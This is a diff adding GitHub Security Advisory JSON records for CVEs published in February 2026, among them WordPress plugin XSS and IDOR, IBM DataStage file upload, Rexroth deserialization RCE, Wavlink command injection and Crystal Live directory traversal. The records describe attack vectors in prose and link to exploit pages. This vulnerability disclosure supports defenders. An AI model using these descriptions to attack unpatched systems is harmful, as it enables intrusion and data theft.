a/advisories/unreviewed/2026/02/GHSA-wpf3-wv8v-2wxj/GHSA-wpf3-wv8v-2wxj.json b/advisories/unreviewed/2026/02/GHSA-wpf3-wv8v-2wxj/GHSA-wpf3-wv8v-2wxj.json new file mode 100644 index 0000000000000..a6b73996ee3fd --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wpf3-wv8v-2wxj/GHSA-wpf3-wv8v-2wxj.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wpf3-wv8v-2wxj", + "modified": "2026-02-18T06:30:19Z", + "published": "2026-02-18T06:30:19Z", + "aliases": [ + "CVE-2025-12071" + ], + "details": "The Frontend User Notes plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 2.1.0 via the 'funp_ajax_modify_notes' AJAX endpoint due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Subscriber-level access and above, to modify arbitrary notes that do not belong to them.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-12071" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/frontend-user-notes/tags/2.1.1/includes/ajax.php" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/30f2dd33-228d-4942-88d9-78c7ed0b79a1?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-639" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T05:16:16Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wpfv-crpp-p2xq/GHSA-wpfv-crpp-p2xq.json b/advisories/unreviewed/2026/02/GHSA-wpfv-crpp-p2xq/GHSA-wpfv-crpp-p2xq.json index 43a22929b9684..d9092449869dc 100644 --- a/advisories/unreviewed/2026/02/GHSA-wpfv-crpp-p2xq/GHSA-wpfv-crpp-p2xq.json +++ b/advisories/unreviewed/2026/02/GHSA-wpfv-crpp-p2xq/GHSA-wpfv-crpp-p2xq.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-wpfv-crpp-p2xq", - "modified": "2026-02-02T09:30:30Z", + "modified": "2026-02-19T15:30:33Z", "published": "2026-02-02T09:30:30Z", "aliases": [ "CVE-2026-20711" diff --git a/advisories/unreviewed/2026/02/GHSA-wpg4-2qjv-77p8/GHSA-wpg4-2qjv-77p8.json b/advisories/unreviewed/2026/02/GHSA-wpg4-2qjv-77p8/GHSA-wpg4-2qjv-77p8.json new file mode 100644 index 0000000000000..8bd20e5c38e97 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wpg4-2qjv-77p8/GHSA-wpg4-2qjv-77p8.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wpg4-2qjv-77p8", + "modified": "2026-02-19T18:31:52Z", + "published": "2026-02-19T18:31:52Z", + "aliases": [ + "CVE-2026-25331" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Melapress WP Activity Log wp-security-audit-log allows DOM-Based XSS.This issue affects WP Activity Log: from n/a through <= 5.5.4.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25331" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/wp-security-audit-log/vulnerability/wordpress-wp-activity-log-plugin-5-5-4-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T09:16:17Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wpqj-w3wq-pqjv/GHSA-wpqj-w3wq-pqjv.json b/advisories/unreviewed/2026/02/GHSA-wpqj-w3wq-pqjv/GHSA-wpqj-w3wq-pqjv.json new file mode 100644 index 0000000000000..65483980066d0 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wpqj-w3wq-pqjv/GHSA-wpqj-w3wq-pqjv.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wpqj-w3wq-pqjv", + "modified": "2026-02-19T18:31:50Z", + "published": "2026-02-19T18:31:50Z", + "aliases": [ + "CVE-2026-0561" + ], + "details": "The Shield Security plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'message' parameter in all versions up to, and including, 21.0.8 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0561" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3439494%40wp-simple-firewall&new=3439494%40wp-simple-firewall&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://research.cleantalk.org/cve-2026-0561" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/cb49eb5f-c1ff-4440-8b53-c2515e65da27?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T07:17:41Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wprr-57fw-46wj/GHSA-wprr-57fw-46wj.json b/advisories/unreviewed/2026/02/GHSA-wprr-57fw-46wj/GHSA-wprr-57fw-46wj.json new file mode 100644 index 0000000000000..231ed8ee9fb52 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wprr-57fw-46wj/GHSA-wprr-57fw-46wj.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wprr-57fw-46wj", + "modified": "2026-02-18T00:30:16Z", + "published": "2026-02-18T00:30:16Z", + "aliases": [ + "CVE-2025-13689" + ], + "details": "IBM DataStage on Cloud Pak for Data could allow an authenticated user to execute arbitrary commands and gain access to sensitive information due to unrestricted file uploads.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-13689" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7259958" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-434" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T23:16:18Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wq2g-h2h9-v8x3/GHSA-wq2g-h2h9-v8x3.json b/advisories/unreviewed/2026/02/GHSA-wq2g-h2h9-v8x3/GHSA-wq2g-h2h9-v8x3.json new file mode 100644 index 0000000000000..9baadc5170937 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wq2g-h2h9-v8x3/GHSA-wq2g-h2h9-v8x3.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wq2g-h2h9-v8x3", + "modified": "2026-02-18T15:31:26Z", + "published": "2026-02-18T15:31:26Z", + "aliases": [ + "CVE-2025-60038" + ], + "details": "A vulnerability has been identified in Rexroth IndraWorks. This flaw allows an attacker to execute arbitrary code on the user's system by parsing a manipulated file containing malicious serialized data. Exploitation requires user interaction, specifically opening a specially crafted file, which then causes the application to deserialize the malicious data, enabling Remote Code Execution (RCE). This can lead to a complete compromise of the system running Rexroth IndraWorks.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-60038" + }, + { + "type": "WEB", + "url": "https://psirt.bosch.com/security-advisories/BOSCH-SA-591522.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wq4c-m266-6c9g/GHSA-wq4c-m266-6c9g.json b/advisories/unreviewed/2026/02/GHSA-wq4c-m266-6c9g/GHSA-wq4c-m266-6c9g.json new file mode 100644 index 0000000000000..97e1557334937 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wq4c-m266-6c9g/GHSA-wq4c-m266-6c9g.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wq4c-m266-6c9g", + "modified": "2026-02-19T18:31:53Z", + "published": "2026-02-19T18:31:53Z", + "aliases": [ + "CVE-2026-25453" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in mdempfle Advanced iFrame advanced-iframe allows DOM-Based XSS.This issue affects Advanced iFrame: from n/a through <= 2025.10.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25453" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/advanced-iframe/vulnerability/wordpress-advanced-iframe-plugin-2025-10-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T09:16:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wqfr-wcp9-8hjx/GHSA-wqfr-wcp9-8hjx.json b/advisories/unreviewed/2026/02/GHSA-wqfr-wcp9-8hjx/GHSA-wqfr-wcp9-8hjx.json new file mode 100644 index 0000000000000..c59992f216ab9 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wqfr-wcp9-8hjx/GHSA-wqfr-wcp9-8hjx.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wqfr-wcp9-8hjx", + "modified": "2026-02-13T06:30:48Z", + "published": "2026-02-13T06:30:48Z", + "aliases": [ + "CVE-2025-48020" + ], + "details": "A vulnerability has been found in Vnet/IP Interface Package provided by Yokogawa Electric Corporation.\nIf affected product receives maliciously crafted packets, Vnet/IP software stack process may be terminated.\nThe affected products and versions are as follows: Vnet/IP Interface Package (for CENTUM VP R6 VP6C3300, CENTUM VP R7 VP7C3300) R1.07.00 or earlier", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:A/AC:H/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-48020" + }, + { + "type": "WEB", + "url": "https://web-material3.yokogawa.com/1/39281/files/YSAR-26-0002-E.pdf" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-617" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-13T05:16:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wqhx-vh8g-2934/GHSA-wqhx-vh8g-2934.json b/advisories/unreviewed/2026/02/GHSA-wqhx-vh8g-2934/GHSA-wqhx-vh8g-2934.json new file mode 100644 index 0000000000000..0c00f56edeb4b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wqhx-vh8g-2934/GHSA-wqhx-vh8g-2934.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wqhx-vh8g-2934", + "modified": "2026-02-12T06:30:13Z", + "published": "2026-02-12T06:30:13Z", + "aliases": [ + "CVE-2026-26091" + ], + "details": "Rejected reason: Not used", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26091" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T05:17:06Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wqpg-jwpg-g42c/GHSA-wqpg-jwpg-g42c.json b/advisories/unreviewed/2026/02/GHSA-wqpg-jwpg-g42c/GHSA-wqpg-jwpg-g42c.json new file mode 100644 index 0000000000000..76bb38fec94c8 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wqpg-jwpg-g42c/GHSA-wqpg-jwpg-g42c.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wqpg-jwpg-g42c", + "modified": "2026-02-12T21:31:26Z", + "published": "2026-02-12T00:31:05Z", + "aliases": [ + "CVE-2026-20681" + ], + "details": "A privacy issue was addressed with improved private data redaction for log entries. This issue is fixed in macOS Tahoe 26.3. An app may be able to access information about a user's contacts.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20681" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126348" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-200" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wr52-6c6f-x6gv/GHSA-wr52-6c6f-x6gv.json b/advisories/unreviewed/2026/02/GHSA-wr52-6c6f-x6gv/GHSA-wr52-6c6f-x6gv.json new file mode 100644 index 0000000000000..d07c65b9ead36 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wr52-6c6f-x6gv/GHSA-wr52-6c6f-x6gv.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wr52-6c6f-x6gv", + "modified": "2026-02-14T18:30:16Z", + "published": "2026-02-14T18:30:16Z", + "aliases": [ + "CVE-2026-23203" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: cpsw_new: Execute ndo_set_rx_mode callback in a work queue\n\nCommit 1767bb2d47b7 (\"ipv6: mcast: Don't hold RTNL for\nIPV6_ADD_MEMBERSHIP and MCAST_JOIN_GROUP.\") removed the RTNL lock for\nIPV6_ADD_MEMBERSHIP and MCAST_JOIN_GROUP operations. However, this\nchange triggered the following call trace on my BeagleBone Black board:\n WARNING: net/8021q/vlan_core.c:236 at vlan_for_each+0x120/0x124, CPU#0: rpcbind/496\n RTNL: assertion failed at net/8021q/vlan_core.c (236)\n Modules linked in:\n CPU: 0 UID: 997 PID: 496 Comm: rpcbind Not tainted 6.19.0-rc6-next-20260122-yocto-standard+ #8 PREEMPT\n Hardware name: Generic AM33XX (Flattened Device Tree)\n Call trace:\n unwind_backtrace from show_stack+0x28/0x2c\n show_stack from dump_stack_lvl+0x30/0x38\n dump_stack_lvl from __warn+0xb8/0x11c\n __warn from warn_slowpath_fmt+0x130/0x194\n warn_slowpath_fmt from vlan_for_each+0x120/0x124\n vlan_for_each from cpsw_add_mc_addr+0x54/0xd8\n cpsw_add_mc_addr from __hw_addr_ref_sync_dev+0xc4/0xec\n __hw_addr_ref_sync_dev from __dev_mc_add+0x78/0x88\n __dev_mc_add from igmp6_group_added+0x84/0xec\n igmp6_group_added from __ipv6_dev_mc_inc+0x1fc/0x2f0\n __ipv6_dev_mc_inc from __ipv6_sock_mc_join+0x124/0x1b4\n __ipv6_sock_mc_join from do_ipv6_setsockopt+0x84c/0x1168\n do_ipv6_setsockopt from ipv6_setsockopt+0x88/0xc8\n ipv6_setsockopt from do_sock_setsockopt+0xe8/0x19c\n do_sock_setsockopt from __sys_setsockopt+0x84/0xac\n __sys_setsockopt from ret_fast_syscall+0x0/0x5\n\nThis trace occurs because vlan_for_each() is called within\ncpsw_ndo_set_rx_mode(), which expects the RTNL lock to be held.\nSince modifying vlan_for_each() to operate without the RTNL lock is not\nstraightforward, and because ndo_set_rx_mode() is invoked both with and\nwithout the RTNL lock across different code paths, simply adding\nrtnl_lock() in cpsw_ndo_set_rx_mode() is not a viable solution.\n\nTo resolve this issue, we opt to execute the actual processing within\na work queue, following the approach used by the icssg-prueth driver.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23203" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/c0b5dc73a38f954e780f93a549b8fe225235c07a" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/d5b3a669866977dc87fd56fcf00a70df1536d258" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-14T17:15:58Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wr9x-74ff-qxqp/GHSA-wr9x-74ff-qxqp.json b/advisories/unreviewed/2026/02/GHSA-wr9x-74ff-qxqp/GHSA-wr9x-74ff-qxqp.json new file mode 100644 index 0000000000000..432445d29590e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wr9x-74ff-qxqp/GHSA-wr9x-74ff-qxqp.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wr9x-74ff-qxqp", + "modified": "2026-02-20T06:30:38Z", + "published": "2026-02-20T06:30:38Z", + "aliases": [ + "CVE-2026-27318" + ], + "details": "Rejected reason: Not used", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27318" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T04:15:57Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wrfj-485j-gjpx/GHSA-wrfj-485j-gjpx.json b/advisories/unreviewed/2026/02/GHSA-wrfj-485j-gjpx/GHSA-wrfj-485j-gjpx.json new file mode 100644 index 0000000000000..e02bcab55ff74 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wrfj-485j-gjpx/GHSA-wrfj-485j-gjpx.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wrfj-485j-gjpx", + "modified": "2026-02-19T00:30:28Z", + "published": "2026-02-19T00:30:28Z", + "aliases": [ + "CVE-2019-25352" + ], + "details": "Crystal Live HTTP Server 6.01 contains a directory traversal vulnerability that allows remote attackers to access system files by manipulating URL path segments. Attackers can use multiple '../' sequences to navigate outside the web root and retrieve sensitive configuration files like Windows system files.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25352" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20190105124716/https://www.crystalrs.com/crystal-quality-introduction" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47666" + }, + { + "type": "WEB", + "url": "https://www.genivia.com" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/genivia-crystal-live-http-server-crystal-live-http-server-path-traversal" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T22:16:20Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wrgv-jmfr-c4gr/GHSA-wrgv-jmfr-c4gr.json b/advisories/unreviewed/2026/02/GHSA-wrgv-jmfr-c4gr/GHSA-wrgv-jmfr-c4gr.json new file mode 100644 index 0000000000000..a0d94f20b63a4 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wrgv-jmfr-c4gr/GHSA-wrgv-jmfr-c4gr.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wrgv-jmfr-c4gr", + "modified": "2026-02-17T21:31:14Z", + "published": "2026-02-17T21:31:14Z", + "aliases": [ + "CVE-2025-36379" + ], + "details": "IBM Security QRadar EDR 3.12 through 3.12.23 IBM Security ReaQta uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-36379" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7260390" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-326" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T21:22:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wrqj-g5w9-qq86/GHSA-wrqj-g5w9-qq86.json b/advisories/unreviewed/2026/02/GHSA-wrqj-g5w9-qq86/GHSA-wrqj-g5w9-qq86.json new file mode 100644 index 0000000000000..3aeb4bad3c3c4 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wrqj-g5w9-qq86/GHSA-wrqj-g5w9-qq86.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wrqj-g5w9-qq86", + "modified": "2026-02-17T21:31:14Z", + "published": "2026-02-17T21:31:14Z", + "aliases": [ + "CVE-2025-27901" + ], + "details": "IBM DB2 Recovery Expert for LUW 5.5 Interim Fix 002 IBM Db2 Recovery Expert for Linux, UNIX and Windows is vulnerable to HTTP header injection, caused by improper validation of input by the HOST headers.  This could allow an attacker to conduct various attacks against the vulnerable system, including cross-site scripting, cache poisoning or session hijacking.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-27901" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7259901" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-644" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T20:22:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wrqv-g27w-82rr/GHSA-wrqv-g27w-82rr.json b/advisories/unreviewed/2026/02/GHSA-wrqv-g27w-82rr/GHSA-wrqv-g27w-82rr.json new file mode 100644 index 0000000000000..6de3b3a47acd8 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wrqv-g27w-82rr/GHSA-wrqv-g27w-82rr.json @@ -0,0 +1,53 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wrqv-g27w-82rr", + "modified": "2026-02-16T03:30:17Z", + "published": "2026-02-16T03:30:17Z", + "aliases": [ + "CVE-2026-2527" + ], + "details": "A vulnerability was determined in Wavlink WL-WN579A3 up to 20210219. Affected is an unknown function of the file /cgi-bin/login.cgi. Executing a manipulation of the argument key can lead to command injection. The attack may be launched remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2527" + }, + { + "type": "WEB", + "url": "https://github.com/MRAdera/IoT-Vuls/blob/main/wavlink/wn579a3/login.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346115" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346115" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.748074" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74", + "CWE-77" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-16T02:16:06Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wrw7-63r4-jj3j/GHSA-wrw7-63r4-jj3j.json b/advisories/unreviewed/2026/02/GHSA-wrw7-63r4-jj3j/GHSA-wrw7-63r4-jj3j.json new file mode 100644 index 0000000000000..3854a945a9868 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wrw7-63r4-jj3j/GHSA-wrw7-63r4-jj3j.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wrw7-63r4-jj3j", + "modified": "2026-02-14T18:30:15Z", + "published": "2026-02-14T18:30:15Z", + "aliases": [ + "CVE-2026-23174" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nnvme-pci: handle changing device dma map requirements\n\nThe initial state of dma_needs_unmap may be false, but change to true\nwhile mapping the data iterator. Enabling swiotlb is one such case that\ncan change the result. The nvme driver needs to save the mapped dma\nvectors to be unmapped later, so allocate as needed during iteration\nrather than assume it was always allocated at the beginning. This fixes\na NULL dereference from accessing an uninitialized dma_vecs when the\ndevice dma unmapping requirements change mid-iteration.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23174" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/071be3b0b6575d45be9df9c5b612f5882bfc5e88" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/f3ed399e9aa6f36e92d2d0fe88b387915e9705fe" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-14T17:15:55Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wrwf-qpx5-8gj4/GHSA-wrwf-qpx5-8gj4.json b/advisories/unreviewed/2026/02/GHSA-wrwf-qpx5-8gj4/GHSA-wrwf-qpx5-8gj4.json new file mode 100644 index 0000000000000..295790e369773 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wrwf-qpx5-8gj4/GHSA-wrwf-qpx5-8gj4.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wrwf-qpx5-8gj4", + "modified": "2026-02-14T09:31:33Z", + "published": "2026-02-14T09:31:33Z", + "aliases": [ + "CVE-2026-1096" + ], + "details": "The Best-wp-google-map plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'latitude' and 'longitudinal' parameters of the 'google_map_view' shortcode in all versions up to, and including, 2.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1096" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/best-wp-google-map/tags/2.1/plug-hook.php#L27" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/best-wp-google-map/trunk/plug-hook.php#L27" + }, + { + "type": "WEB", + "url": "https://wordpress.org/plugins/best-wp-google-map" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/b3219b17-03b8-44c3-bf35-36b8b7457f8a?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-14T07:16:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wvch-mq77-2vf3/GHSA-wvch-mq77-2vf3.json b/advisories/unreviewed/2026/02/GHSA-wvch-mq77-2vf3/GHSA-wvch-mq77-2vf3.json new file mode 100644 index 0000000000000..72368fc76c3b9 